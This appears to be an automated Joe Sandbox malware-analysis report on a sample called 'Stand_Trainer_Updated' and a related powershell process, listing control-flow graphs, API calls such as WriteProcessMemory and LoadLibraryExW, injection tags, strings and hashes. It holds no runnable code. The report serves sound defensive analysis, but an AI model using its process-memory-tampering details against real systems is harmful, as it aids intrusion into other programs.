                                                                                      control_flow_graph 938 7ffb22652230-7ffb2265227f CreateToolhelp32Snapshot 939 7ffb226523fb-7ffb2265242d strcpy_s call 7ffb22652550 938->939 940 7ffb22652285-7ffb22652295 Process32First 938->940 945 7ffb2265242f-7ffb22652439 939->945 946 7ffb22652456-7ffb22652467 939->946 942 7ffb2265229b-7ffb2265229d 940->942 942->939 944 7ffb226522a3-7ffb226522a7 942->944 947 7ffb226522b9-7ffb226522de call 7ffb22654920 944->947 948 7ffb226522a9-7ffb226522b7 Process32Next 944->948 945->946 952 7ffb2265243b-7ffb2265244b 945->952 950 7ffb22652469-7ffb2265246f free 946->950 951 7ffb22652476-7ffb2265249c call 7ffb22654570 946->951 956 7ffb226522e1-7ffb226522e9 947->956 948->942 950->951 952->946 958 7ffb2265244d-7ffb22652450 952->958 956->956 959 7ffb226522eb-7ffb2265231c call 7ffb22651720 956->959 958->946 962 7ffb22652372-7ffb22652375 959->962 963 7ffb2265231e-7ffb22652326 959->963 962->939 964 7ffb2265237b-7ffb2265239e GetForegroundWindow GetWindowThreadProcessId 962->964 965 7ffb22652328-7ffb22652336 963->965 966 7ffb22652355-7ffb2265236d call 7ffb22654918 963->966 967 7ffb226523c0-7ffb226523c7 964->967 968 7ffb226523a0-7ffb226523a7 964->968 969 7ffb22652350 call 7ffb22654918 965->969 970 7ffb22652338-7ffb2265234b 965->970 966->962 973 7ffb226523e3-7ffb226523eb 967->973 974 7ffb226523c9-7ffb226523d0 967->974 972 7ffb226523a9-7ffb226523b7 968->972 968->973 969->966 975 7ffb2265234d 970->975 976 7ffb226523b9-7ffb226523bf _invalid_parameter_noinfo_noreturn 970->976 978 7ffb226523d7-7ffb226523dd strcpy_s 972->978 973->951 979 7ffb226523f1-7ffb226523f6 call 7ffb226536e0 973->979 974->978 975->969 976->967 978->973 979->951
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32Windowstrcpy_s$CreateFirstForegroundNextProcessSnapshotThreadToolhelp32_invalid_parameter_noinfo_noreturnfree
                                                                                      • String ID: focus$reset$unfocus
                                                                                      • API String ID: 64550660-3106794205
                                                                                      • Opcode ID: e7c99580bd7c60a15c07992298f68fdcd850852949cf6604d91e12ff0a8fd0d3
                                                                                      • Instruction ID: 0412e1fc3d3941ff25e94b38e0d65f1ebdf5835588dcd4cba458fcc6d00bd14d
                                                                                      • Opcode Fuzzy Hash: e7c99580bd7c60a15c07992298f68fdcd850852949cf6604d91e12ff0a8fd0d3
                                                                                      • Instruction Fuzzy Hash: 186160A3A286C285FB538B35EC4437973A0FB48B94F448135D98D866A5DFFCE4A4C740
                                                                                      Function 00007FFB22651720 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132injectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite$memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                      • String ID: AND NotAvailableInAutoshow=0$ AND NotAvailableInAutoshow=1
                                                                                      • API String ID: 2427741960-1967300337
                                                                                      • Opcode ID: 50c7807b714074bc3cde8963075cd9d3c8a6124ba4fd18cff7efebee71432e17
                                                                                      • Instruction ID: 1ad80dfc8962176b4727639a4afb0ae508874e5648bccbdf1180454f01d29673
                                                                                      • Opcode Fuzzy Hash: 50c7807b714074bc3cde8963075cd9d3c8a6124ba4fd18cff7efebee71432e17
                                                                                      • Instruction Fuzzy Hash: 2E51C3A3B28AC684FA279B25DD042B92760FB44FD4F540571CA6D87BA5DFBCE461C300
                                                                                      Function 00007FFB22654988 Relevance: 13.7, APIs: 9, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                      • String ID:
                                                                                      • API String ID: 349153199-0
                                                                                      • Opcode ID: 5dc3a2c061d603ebea0dc15b17bef94147f44fca3a790ac9016eac81c12b021b
                                                                                      • Instruction ID: 11b0bdcc59fc85c60e692dba87c5eea19ed5fa9dbf9d4d9bf3d4ab403a42750d
                                                                                      • Opcode Fuzzy Hash: 5dc3a2c061d603ebea0dc15b17bef94147f44fca3a790ac9016eac81c12b021b
                                                                                      • Instruction Fuzzy Hash: 7F818BA3E3C6C386F6939F75DC812792290BF85784F144175E94CE7B96DEACE8618700
                                                                                      Function 00007FFB226510C0 Relevance: 13.6, APIs: 9, Instructions: 108injectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcess$Read$Write
                                                                                      • String ID:
                                                                                      • API String ID: 2601675199-0
                                                                                      • Opcode ID: 7ee7c050f7f7f51261b789aad5b224ef0e50c02b930656cee03c470f5aaca468
                                                                                      • Instruction ID: 8c1652e89e8bfc26271643130190a85ec43f0174c449b967837e538aab324ea2
                                                                                      • Opcode Fuzzy Hash: 7ee7c050f7f7f51261b789aad5b224ef0e50c02b930656cee03c470f5aaca468
                                                                                      • Instruction Fuzzy Hash: AE51DBB7716FD689EB918F25DC406997320FB98B89F445122EE4E93B28DF78C195C340
                                                                                      Function 00007FFB22653B70 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1738635707-0
                                                                                      • Opcode ID: 90702b10806ec90035e6f9983b6b7e09ddf27c14c661ce296dfff093e261c8fb
                                                                                      • Instruction ID: 5fed89c49af1dbeb62367af2975162f7703696fcc157d05d6249d45a844ecea5
                                                                                      • Opcode Fuzzy Hash: 90702b10806ec90035e6f9983b6b7e09ddf27c14c661ce296dfff093e261c8fb
                                                                                      • Instruction Fuzzy Hash: BE51A3A2A29AC684FE17DB35EC452B86361BF44BD0F840631DA5D9BBD5DEBCE0608300
                                                                                      Function 00007FFB22651D80 Relevance: 10.7, APIs: 7, Instructions: 153injectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcess$Writefreememcpy$Read_invalid_parameter_noinfo_noreturnmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1560051262-0
                                                                                      • Opcode ID: 5d09cd1697ce0e85060163274d83c08a82e2468e5510c7f618081edddadb3396
                                                                                      • Instruction ID: cec7b178e0c6142886dc51615b969784738ff98a3b033dd6de5584d0606fc9ac
                                                                                      • Opcode Fuzzy Hash: 5d09cd1697ce0e85060163274d83c08a82e2468e5510c7f618081edddadb3396
                                                                                      • Instruction Fuzzy Hash: 966160A7A29BC281FA138B25EC442697364FB85BD0F540132DA9D93B64DFBCE5A1C700
                                                                                      Function 00007FFB22653F50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FFB226536D9), ref: 00007FFB22653F5B
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFB226536D9), ref: 00007FFB2265401D
                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFB226536D9), ref: 00007FFB2265405D
                                                                                        • Part of subcall function 00007FFB22654920: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB2265103E), ref: 00007FFB2265493A
                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFB226536D9), ref: 00007FFB22654070
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB226540AD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$Concurrency::cancel_current_taskXout_of_range@std@@_invalid_parameter_noinfo_noreturnmalloc
                                                                                      • String ID: invalid vector subscript
                                                                                      • API String ID: 225515916-1949860628
                                                                                      • Opcode ID: a7de3c16eb63e3b623d02498fccd81339706b82cc1b6655b6c5c59361fd26349
                                                                                      • Instruction ID: 708b29b69421e4657494a7dedc97d5ae1024d0ffda4b78d99d134403fc90417a
                                                                                      • Opcode Fuzzy Hash: a7de3c16eb63e3b623d02498fccd81339706b82cc1b6655b6c5c59361fd26349
                                                                                      • Instruction Fuzzy Hash: B931A0A3628AC581E916DF36EC041B9A7A0BF54BE0F284531DE6D97BD5CEBCE061C300
                                                                                      Function 00007FFB226536E0 Relevance: 9.2, APIs: 6, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessReadmemcmp
                                                                                      • String ID:
                                                                                      • API String ID: 3176920756-0
                                                                                      • Opcode ID: bcccaca4536aae3c17190eb64e39493890961a33e0c5a1b4d314fc494e5810b3
                                                                                      • Instruction ID: d0e24bf9b281c8569980135ae1885994498e490f36327a8337c0c93aea23d6bc
                                                                                      • Opcode Fuzzy Hash: bcccaca4536aae3c17190eb64e39493890961a33e0c5a1b4d314fc494e5810b3
                                                                                      • Instruction Fuzzy Hash: 64C14DB3A25AC589FB128F35DC442A83361FB58B88F484531EA5D97B99CFBCD5A1C340
                                                                                      Function 00007FFB22654200 Relevance: 7.6, APIs: 5, Instructions: 105processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Module32$CreateFirstNextOpenProcessSnapshotToolhelp32memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 3551813145-0
                                                                                      • Opcode ID: ef27848728e57b00f54bf132d20fc1e322867d02a7ea20d45f5984dffdf8b1fe
                                                                                      • Instruction ID: 62dbbb4226a64fa49c8f7e36418501b6c9b73fe90cb3541c4de4c476c747c6c0
                                                                                      • Opcode Fuzzy Hash: ef27848728e57b00f54bf132d20fc1e322867d02a7ea20d45f5984dffdf8b1fe
                                                                                      • Instruction Fuzzy Hash: 5E413C72519B8185E7628F21FC4426AB3A4FB887A4F458234DADD83B94EFBCD5A5C700
                                                                                      Function 00007FFB226524A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33injectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite$free
                                                                                      • String ID: AND NotAvailableInAutoshow=0
                                                                                      • API String ID: 3251193346-2000189202
                                                                                      • Opcode ID: 5dd114985b51e524ecdaeb4a6ee6680aac70342fb451392c15103262cd97a31d
                                                                                      • Instruction ID: ee6c4ca90c8b7cdf20ef23b5662890266d699200136b9b8f5afda2c6ce9c4e86
                                                                                      • Opcode Fuzzy Hash: 5dd114985b51e524ecdaeb4a6ee6680aac70342fb451392c15103262cd97a31d
                                                                                      • Instruction Fuzzy Hash: 6A11DBB6A29AC681FA538B25EC543693360FF84B84F944436C94E93724CFBDE565C700
                                                                                      Function 00007FFB22653DD0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFB22652809), ref: 00007FFB22653E46
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFB22652809), ref: 00007FFB22653E51
                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFB22652809), ref: 00007FFB22653E88
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFB22652809), ref: 00007FFB22653EEC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$MemoryProcessReadmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 945422901-0
                                                                                      • Opcode ID: 14e76d314a38f5860d661b66c69f591f3506736d51f1cf77ff05bd61f85d3f90
                                                                                      • Instruction ID: 253cec4dcbec4393d4e7dc6c96cb10c3b1ec06813f31f24e8d867f61723c81f8
                                                                                      • Opcode Fuzzy Hash: 14e76d314a38f5860d661b66c69f591f3506736d51f1cf77ff05bd61f85d3f90
                                                                                      • Instruction Fuzzy Hash: 28419C63A19BC581EA52CF26ED042B8A7A0FB48F84F5C4036EE4D87744DFB8D4A1C340
                                                                                      Function 00007FFB226514A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FFB226514AB
                                                                                        • Part of subcall function 00007FFB22654920: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB2265103E), ref: 00007FFB2265493A
                                                                                        • Part of subcall function 00007FFB22653B70: memcpy.VCRUNTIME140 ref: 00007FFB22653C75
                                                                                        • Part of subcall function 00007FFB22653B70: memcpy.VCRUNTIME140 ref: 00007FFB22653C8F
                                                                                        • Part of subcall function 00007FFB22653B70: memset.VCRUNTIME140 ref: 00007FFB22653CA4
                                                                                        • Part of subcall function 00007FFB22653B70: memset.VCRUNTIME140 ref: 00007FFB22653CE7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset$Xlength_error@std@@malloc
                                                                                      • String ID: Cost=0$string too long
                                                                                      • API String ID: 2569986753-2966528296
                                                                                      • Opcode ID: ad06fa48fd60ba2b4d54c49a69b272a0f8c7bc0fc8a353929bb8a211ab6cc02f
                                                                                      • Instruction ID: 8df0f71b0a2f11fa489688069611e35e072a9eea3d980dacffba5fe4208cbaa2
                                                                                      • Opcode Fuzzy Hash: ad06fa48fd60ba2b4d54c49a69b272a0f8c7bc0fc8a353929bb8a211ab6cc02f
                                                                                      • Instruction Fuzzy Hash: 4E3119A2929AC685FA039F29EC453A97360FF95B84F405235D94D97761DFBCE1A1C300

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:3
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 8817 7ffaac676c34 8818 7ffaac676c3d LoadLibraryExW 8817->8818 8820 7ffaac676ced 8818->8820

                                                                                      Executed Functions

                                                                                      Function 00007FFAAC676C34 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1755549427.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaac660000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 5bd69cadf7f6a856c640e5c62bc9ffbbeee1519b90ef20fd98c7a4a7bd8498b4
                                                                                      • Instruction ID: f82dbb9345d4c542fa60109c31514d79cfacb782380d255c11ae5492efc28020
                                                                                      • Opcode Fuzzy Hash: 5bd69cadf7f6a856c640e5c62bc9ffbbeee1519b90ef20fd98c7a4a7bd8498b4
                                                                                      • Instruction Fuzzy Hash: 3131F53190CA5C8FEB19DB68D849BE9BBE1FF56320F04826BD00DD3152CB74A405CB91
                                                                                      Function 00007FFAAC67664A Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1755549427.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaac660000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: ab3e157c70d3e9aedc6233fd1dd314cefab1a4e824219b88af2bdf68862e7900
                                                                                      • Instruction ID: 114bd9dd7bf3dea2d3dbca6a9b8bc4e627b6b11d82e630985e05231a11bf443d
                                                                                      • Opcode Fuzzy Hash: ab3e157c70d3e9aedc6233fd1dd314cefab1a4e824219b88af2bdf68862e7900
                                                                                      • Instruction Fuzzy Hash: F2217E71908A1C9FEB58DB58D449BF9BBE1FB69321F00822ED00ED3651DB71A8458B81
                                                                                      Function 00007FFAAC73343B Relevance: .4, Instructions: 394COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1756966131.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaac730000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c657d8144bfd834b4e7e5ccc1212b754fb6c51b8584a2230183ca7971b345fc3
                                                                                      • Instruction ID: 499452973a152c48df5eb729b60f1bc35fabc8804e6515a6e1f41b1bd3dbae1f
                                                                                      • Opcode Fuzzy Hash: c657d8144bfd834b4e7e5ccc1212b754fb6c51b8584a2230183ca7971b345fc3
                                                                                      • Instruction Fuzzy Hash: 34C13A61A0EA8A8FF765EB6C88555B97BE0EF46320B0441BED44DC7293DE18DC0AC3D1
                                                                                      Function 00007FFAAC7335E3 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 345 7ffaac7335e3-7ffaac7335ed 347 7ffaac733670-7ffaac73367a 345->347 348 7ffaac7335f3-7ffaac7335fb 345->348 349 7ffaac73367c-7ffaac733688 347->349 350 7ffaac733689-7ffaac73378b 347->350 351 7ffaac7335fd-7ffaac733607 348->351 352 7ffaac73360b 348->352 353 7ffaac733609 351->353 354 7ffaac733627-7ffaac733656 351->354 356 7ffaac733610-7ffaac733625 352->356 353->356 363 7ffaac73365d-7ffaac73366f 354->363 356->354
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1756966131.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaac730000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 39fa871fba6f15fad6c9ab856cd744775383527fbd363a44f08770d70b7d48ca
                                                                                      • Instruction ID: 06bed7b9d3b7f81676ae78f1def3748c40bd241599c0e27fb9cd51f54854c29f
                                                                                      • Opcode Fuzzy Hash: 39fa871fba6f15fad6c9ab856cd744775383527fbd363a44f08770d70b7d48ca
                                                                                      • Instruction Fuzzy Hash: 99119421B0E649CFF764DB5C84445B877E1EF55321F1450BED04ED7283DE19980A83D1